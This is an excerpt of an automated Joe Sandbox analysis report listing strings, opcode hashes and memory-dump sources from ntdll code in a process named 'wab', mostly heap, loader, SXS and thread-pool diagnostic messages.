                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: 3f3f6acdaf95e8a80a48bbc072429382d94f0de88bda12c1b7a3edc15c8c9820
                                          • Instruction ID: c5f51323b189832b4932b0eb6c17ce6df0a4245cbfb34af0f852f61f0a1cf658
                                          • Opcode Fuzzy Hash: 3f3f6acdaf95e8a80a48bbc072429382d94f0de88bda12c1b7a3edc15c8c9820
                                          • Instruction Fuzzy Hash: AF42FD312087819FD309CF29C884B1ABBE5FF98704F04496DE5AADB362D774E981CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: H/n$$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-485709890
                                          • Opcode ID: 01a4df347b3ace6e9c466f8f316747c797cd997888755a99a49af5f703b8d450
                                          • Instruction ID: 29a7262dbacb1a3bb186e9c19ad40fe42637b118ac8ebcd727ba2d4ef371b27a
                                          • Opcode Fuzzy Hash: 01a4df347b3ace6e9c466f8f316747c797cd997888755a99a49af5f703b8d450
                                          • Instruction Fuzzy Hash: A3F14C72E12619EFDB01CFE8C980DEEBBF9FF58610F11406AE515AB214E7709E018B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                          • API String ID: 0-122214566
                                          • Opcode ID: d40a9faf3f5e53fb1ea0f21d943d1a65c359b93dc6da383e4a1de4cc0817e4e1
                                          • Instruction ID: 3f46fd1628868014b4fe5a03445493a8eae136cc7ab9921703ea0870d2d5c1a9
                                          • Opcode Fuzzy Hash: d40a9faf3f5e53fb1ea0f21d943d1a65c359b93dc6da383e4a1de4cc0817e4e1
                                          • Instruction Fuzzy Hash: 81C17533B00616EBEB14CF64C880FBE7BA5AF54B04F1541A9E915AB389EB74CD44D391
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                          • API String ID: 0-1745908468
                                          • Opcode ID: a9fb1d67aa031afaf61e366fb7678d1dea527278e07872ae8373dab3b39d1960
                                          • Instruction ID: b4763a8f14051e5918fd12fd977dd0a17ec0d6ae71f6dcd85a36b8bb5100fde0
                                          • Opcode Fuzzy Hash: a9fb1d67aa031afaf61e366fb7678d1dea527278e07872ae8373dab3b39d1960
                                          • Instruction Fuzzy Hash: C6912231A00645DFEB06CF69C480A9DBBF2FF19710F148099E8ABAB762CB759940CF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 247321BF
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 24732178
                                          • RtlGetAssemblyStorageRoot, xrefs: 24732160, 2473219A, 247321BA
                                          • SXS: %s() passed the empty activation context, xrefs: 24732165
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 2473219F
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 24732180
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: 1a41166e3108f77337ec4a24d21f622a6e8f93670b2b47661d7a39acebe98568
                                          • Instruction ID: 4700981524224685c92de88ac8f9ae8e10b253f444ab4cf8a7e2b28a9c6ad86c
                                          • Opcode Fuzzy Hash: 1a41166e3108f77337ec4a24d21f622a6e8f93670b2b47661d7a39acebe98568
                                          • Instruction Fuzzy Hash: C731E376F019247BE7118A968D94F5B7F78EB75A50F0200A9FA15AF24AD230DE00CEE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrpInitializeProcess, xrefs: 246FC6C4
                                          • LdrpInitializeImportRedirection, xrefs: 24738177, 247381EB
                                          • Loading import redirection DLL: '%wZ', xrefs: 24738170
                                          • minkernel\ntdll\ldrinit.c, xrefs: 246FC6C3
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 24738181, 247381F5
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 247381E5
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          • Opcode ID: e34fd9e9d0176013adf474e784739d62c783bdbc62d19c7dbca771acc675bcde
                                          • Instruction ID: ba3fb5bcece88186ea8b93fda7bccf11ff8112aa78ab8c29c8cde59d907fd957
                                          • Opcode Fuzzy Hash: e34fd9e9d0176013adf474e784739d62c783bdbc62d19c7dbca771acc675bcde
                                          • Instruction Fuzzy Hash: 673112717097019FD214DF28CD89E6ABBE6EF94720F050568F895AB396E620DC04CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 247302E7
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 247302BD
                                          • RTL: Re-Waiting, xrefs: 2473031E
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1975516107
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: This is located in the %s field of the heap header.$ -k$`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 0-297660498
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                          • API String ID: 0-3061284088
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-3570731704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\Ui$
                                          • API String ID: 0-1567251685
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • @, xrefs: 246F8591
                                          • LdrpInitializeProcess, xrefs: 246F8422
                                          • minkernel\ntdll\ldrinit.c, xrefs: 246F8421
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 246F855E
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • SXS: %s() passed the empty activation context, xrefs: 247321DE
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 247321D9, 247322B1
                                          • .Local, xrefs: 246F28D8
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 247322B6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\Ui$${
                                          • API String ID: 0-1596591701
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 2472106B
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 247210AE
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 24720FE5
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 24721028
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 0-2586055223
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 2472A992
                                          • LdrpDynamicShimModule, xrefs: 2472A998
                                          • minkernel\ntdll\ldrinit.c, xrefs: 2472A9A2
                                          • TGi$, xrefs: 246E2462
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGi$$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2230103857
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                          • API String ID: 0-1391187441
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$BuildLabEx$Eo$$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                          • API String ID: 0-3340964777
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $ $0
                                          • API String ID: 0-3352262554
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: 30651166561991dd6f2a4eff04b9b225d5d837e2271033bc6c396fba20f850e6
                                          • Instruction ID: 8fca59dee2354b2ca18bebc02b48773afcc6cdc67385608395e14d3c1d0906ea
                                          • Opcode Fuzzy Hash: 30651166561991dd6f2a4eff04b9b225d5d837e2271033bc6c396fba20f850e6
                                          • Instruction Fuzzy Hash: 46F17771B00A05EFEB15CF68C994F6AB7F5FB44708F1481A8E5259B386D734AA81CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • HEAP[%wZ]: , xrefs: 246C1712
                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 246C1728
                                          • HEAP: , xrefs: 246C1596
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: 765383cd122afe6780cc88577e7b45e3ed5c81300ab011aad12e67af742e420d
                                          • Instruction ID: 37311988c489fa39cb8871890e6c137bc4dc9a0b5e2262658a8555ffb8e191fa
                                          • Opcode Fuzzy Hash: 765383cd122afe6780cc88577e7b45e3ed5c81300ab011aad12e67af742e420d
                                          • Instruction Fuzzy Hash: 28E1F070A042459FD71ACF29C498BBABBF5EF68300F14849DE9A6CB346D734E940CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                          • API String ID: 0-2391371766
                                          • Opcode ID: dbcf939201cccd0e8e7dc6fe8e0a7f0f1d794757980bc3e8a7f79e3645b12030
                                          • Instruction ID: ce9166a035ce81e6e8ab6e289d0cf24d237729ada8cfd458a4d00374bf2323ba
                                          • Opcode Fuzzy Hash: dbcf939201cccd0e8e7dc6fe8e0a7f0f1d794757980bc3e8a7f79e3645b12030
                                          • Instruction Fuzzy Hash: D7B18C72B45341AFE311DF54D884F6BBBF8EB44714F014929FAA4AB390D7B4E8448B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          • Opcode ID: 5c43f04e10b3c93ae2842fcd29e029f1dc2215e875b727e715c65f0c134b8c71
                                          • Instruction ID: 925de91543e60c7b98e20ece4ffb3bc0a2a5693c22f3b13a4c0979097a8c3d29
                                          • Opcode Fuzzy Hash: 5c43f04e10b3c93ae2842fcd29e029f1dc2215e875b727e715c65f0c134b8c71
                                          • Instruction Fuzzy Hash: 71A17B729116299FDB21DF64CC88BEAB7B8EF48700F1041EAE91CA7250E7359E84DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
